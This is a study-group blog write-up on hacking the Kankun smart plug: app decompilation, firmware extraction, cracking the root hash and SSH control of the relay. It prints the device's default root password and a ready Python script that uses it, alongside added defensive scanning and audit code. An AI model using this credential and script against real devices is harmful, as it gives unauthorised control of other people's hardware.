Exploiting the vulnerable Kankun smart plug

It has now been almost one year since we started working on the Internet of Things under the IoT study group, an initiative by the Null Bhopal chapter. The Internet of Things has indeed made a revolutionary change in the way we live, making it more comfortable. But its security still remains a point of concern. Small mistakes at the time of manufacturing can sometimes lead to serious security breaches.

In this process of learning, one of our mentors, Mr. Anant Shrivastava, sponsored us a Kankun smart plug, and the loopholes present in it made it a perfect device for penetration testing.

The Kankun smart plug is an ON/OFF switch that can be controlled by an app. A basic port scan showed that the smart plug has its SSH port open by default, and this makes the plug vulnerable to almost any kind of exploit that can be performed on an IoT device.

We initially started with the manual. Google Translate comes in handy ☺

The manual that comes along with the plug tells you where to download the app from. The next step is to set it up and connect the smartphone and the smart plug to the same Wi-Fi network. When successfully configured, the smart plug is added to the device list and can be controlled remotely via the mobile app. There is another feature, “Direct Mode”, where the smart plug acts as a station with SSID OK_SP3, and by default there is no password for that network.


Exploitation phase

The very first thing to look for was the firmware, because it gives an overview of the device’s software. Information such as the filesystem used, the bootloader and the binaries present can be of great help from a pentester’s point of view. Firmware images are often available on the internet, but if you are unable to find one, another approach is to reverse engineer the app. First you need to get at the actual source code. There are many ways to obtain the source of an APK file; here we use a tool named jadx to extract it.


The next step is to analyse all the extracted files for hardcoded URLs. One way is to check the files one by one, but that is time-consuming. Intelligent use of grep saves a lot of time.


So here we use the grep command with switches that directly print every URL found in every file of all the sub-folders, along with its line number. We started by analysing the Hangzhou folder. Luckily we found some hardcoded URLs.
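The same sweep, written out as a small Python scanner rather than a grep one-liner, is added here as an example; it is not code from the original post. It walks a decompiled source tree, reports every URL with its file and line number, and separately lists the ones ending in a firmware-like extension such as .bin. The sample tree it scans is constructed inline (the hostnames use the reserved .invalid TLD and are not the vendor’s real endpoints), so the script runs offline.

```python
import os
import re
import tempfile

# Matches http(s) URLs up to the first quote, whitespace or angle bracket, so a URL
# inside a Java string literal or an XML text node is captured without its delimiter.
URL_RE = re.compile(r'https?://[^\s"\'<>]+')

# Extensions that usually mean the URL points at a downloadable firmware image.
FIRMWARE_SUFFIXES = ('.bin', '.img', '.trx')


def find_urls(root):
    """Walk a decompiled source tree and return (relative path, line number, url)
    for every URL found, in a deterministic order."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            # errors='replace' keeps the scan going over the odd binary resource.
            with open(full, encoding='utf-8', errors='replace') as fh:
                for lineno, line in enumerate(fh, 1):
                    for url in URL_RE.findall(line):
                        hits.append((rel, lineno, url))
    return hits


def firmware_urls(hits):
    """Keep only the hits whose URL looks like a firmware image download."""
    return [h for h in hits if h[2].lower().endswith(FIRMWARE_SUFFIXES)]


# Constructed stand-in for a jadx output tree (not the real decompiled app).
SAMPLE_TREE = {
    'com/hangzhou/PreferencesUtil.java': (
        'package com.hangzhou;\n'
        'public class PreferencesUtil {\n'
        '    static final String FW_URL = "http://firmware.example.invalid/kkeps.bin";\n'
        '}\n'),
    'com/hangzhou/Api.java': (
        'package com.hangzhou;\n'
        'public class Api {\n'
        '    // base URL for the cloud API\n'
        '    static final String BASE = "https://api.example.invalid/v1/";\n'
        '}\n'),
    'res/values/strings.xml': (
        '<resources>\n'
        '    <string name="help">http://help.example.invalid/manual</string>\n'
        '</resources>\n'),
}


def write_sample_tree(root):
    """Materialise SAMPLE_TREE under root."""
    for rel, text in SAMPLE_TREE.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'w', encoding='utf-8') as fh:
            fh.write(text)


def run_demo():
    """Build the sample tree in a temp dir, scan it and return (all hits, firmware hits)."""
    root = tempfile.mkdtemp(prefix='jadx-out-')
    write_sample_tree(root)
    hits = find_urls(root)
    return hits, firmware_urls(hits)


if __name__ == '__main__':
    all_hits, fw_hits = run_demo()
    for path, lineno, url in all_hits:
        print('%s:%d: %s' % (path, lineno, url))
    print('firmware candidates:', [h[2] for h in fw_hits])
```

Point find_urls at the real jadx output directory instead of the constructed tree to get the same file:line:url listing grep produces, with the .bin candidates already separated out.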


The highlighted text in the above screenshot shows the hardcoded URL in the file PreferencesUtil.java. Since the URL ends with .bin, it could be the link to the actual firmware. And indeed, the app downloads this firmware from that URL and flashes it to the device. After downloading the firmware, run binwalk on the kkeps.bin file. It provides loads of useful information, such as the LZMA compressed data and the squashfs filesystem the image contains. With this information, the -e switch can be used to extract the filesystem.

Binwalk can be installed with

# sudo apt-get install binwalk

The further dependencies of binwalk can be resolved by running the deps.sh script from the project repository:

https://github.com/ReFirmLabs/binwalk/blob/master/deps.sh

# binwalk -e kkeps.bin


So here is the entire Linux filesystem. The next step is to get the root password, which is not very difficult when you have the whole filesystem. Run unshadow (shipped with John the Ripper) from the root of the extracted filesystem, so that it merges the plug’s passwd and shadow files rather than the ones on your own machine:

# unshadow etc/passwd etc/shadow > passwd.txt


Cracking this with John the Ripper gives the root password, which is p9z34c.
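What unshadow does, and the check a firmware reviewer should run on the result before a device ships, as an added Python example that is not part of the original post: merge each account’s shadow hash back into its passwd line, classify the hash scheme, and flag every account that can still log in with a password, especially uid 0 and weak, fast-to-crack schemes like MD5-crypt or DES-crypt. The passwd and shadow contents are constructed stand-ins for an extracted firmware root; the root hash is a placeholder in $1$ format, not the plug’s real hash.

```python
import re

# Constructed stand-ins for etc/passwd and etc/shadow of an extracted firmware root.
# The root hash below is a placeholder in MD5-crypt ($1$) format, not a real hash.
SAMPLE_PASSWD = (
    'root:x:0:0:root:/root:/bin/ash\n'
    'daemon:*:1:1:daemon:/var:/bin/false\n'
    'nobody:*:65534:65534:nobody:/var:/bin/false\n'
)
SAMPLE_SHADOW = (
    'root:$1$PLACEHOLD$PLACEHOLDERHASH0000000:0:0:99999:7:::\n'
    'daemon:*:0:0:99999:7:::\n'
    'nobody:*:0:0:99999:7:::\n'
)


def unshadow_merge(passwd_text, shadow_text):
    """Do what John's unshadow does: put each account's shadow hash back into the
    password field of its passwd line. Returns the merged lines."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith('#'):
            user, hash_field = line.split(':', 2)[:2]
            hashes[user] = hash_field
    merged = []
    for line in passwd_text.splitlines():
        if not line or line.startswith('#'):
            continue
        fields = line.split(':')
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(':'.join(fields))
    return merged


def classify_hash(h):
    """Name the crypt(3) scheme so weak formats stand out in the audit."""
    if h in ('', None):
        return 'empty'
    if h.startswith(('*', '!')):
        return 'locked'
    if h.startswith('$1$'):
        return 'md5crypt'
    if h.startswith('$5$'):
        return 'sha256crypt'
    if h.startswith('$6$'):
        return 'sha512crypt'
    if re.fullmatch(r'[./0-9A-Za-z]{13}', h):
        return 'descrypt'
    return 'unknown'


# Schemes a firmware review should treat as a finding on their own.
WEAK_SCHEMES = ('empty', 'md5crypt', 'descrypt')


def audit_accounts(merged_lines):
    """Return one finding per account that is not locked, noting whether it is
    uid 0 and whether its hash uses a weak scheme."""
    findings = []
    for line in merged_lines:
        fields = line.split(':')
        user, pw_hash, uid = fields[0], fields[1], int(fields[2])
        scheme = classify_hash(pw_hash)
        if scheme == 'locked':
            continue
        findings.append({
            'user': user,
            'uid': uid,
            'scheme': scheme,
            'is_root': uid == 0,
            'weak_scheme': scheme in WEAK_SCHEMES,
        })
    return findings


if __name__ == '__main__':
    merged = unshadow_merge(SAMPLE_PASSWD, SAMPLE_SHADOW)
    for finding in audit_accounts(merged):
        print(finding)
```

On a real extracted image, feed the contents of etc/passwd and etc/shadow to unshadow_merge; a uid-0 account with a non-locked hash baked into read-only firmware is the finding this post is built on, whatever the scheme, because the same credential ends up on every unit shipped.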

CONTROLLING THE SMART PLUG WITH TERMINAL

Now that we know the root password, we can SSH directly into the smart plug. By default the Kankun smart plug has its SSH port open.


Turning the smart plug ON and OFF is easy once we are logged in over SSH. The root password is p9z34c, which we successfully extracted above. The relay is exposed through the LED subsystem in sysfs.

Turning the smart plug off

# echo 0 > /sys/class/leds/tp-link:blue:relay/brightness

Turning the smart plug on

# echo 1 > /sys/class/leds/tp-link:blue:relay/brightness

This entire process can be done with the help of this Python script that I wrote. This script requires the paramiko library.

# apt-get install python3-paramiko

import sys
import paramiko

# terminal colours for the status messages
GREEN = '\033[92m'
BLUE = '\033[94m'
RED = '\033[91m'
RESET = '\x1b[0m'

# usage: python3 kankun.py <plug-ip> on|off
if len(sys.argv) < 3 or sys.argv[2] not in ('on', 'off'):
    print('usage: %s <host> on|off' % sys.argv[0])
    sys.exit(1)

host = sys.argv[1]
action = sys.argv[2]

ssh = paramiko.SSHClient()
# AutoAddPolicy accepts whatever host key the plug presents (no MITM protection);
# fine on a lab network, which is where this script is meant to run.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

print(BLUE + '[*]   connecting to device' + RESET)
# the default root credential recovered from the firmware above
ssh.connect(host, username='root', password='p9z34c')

# the relay is driven through sysfs: 1 = on, 0 = off
path = '/sys/class/leds/tp-link:blue:relay/brightness'
value = '1' if action == 'on' else '0'
_, stdout, _ = ssh.exec_command('echo %s > %s' % (value, path))
stdout.channel.recv_exit_status()  # wait for the command to finish before closing

colour = GREEN if action == 'on' else RED
print(colour + '[*]   turning it ' + action + RESET)
ssh.close()

That is how we successfully managed to control the smart plug remotely without the Android app. ☺

This report is drafted under the IoT study group, an initiative by Null Bhopal chapter.

Thanks for reading!!

I also write tech and security related blogs on my personal website.

Contributors:

Shreya Pohekar

Deepanshu Gajbhiye

 
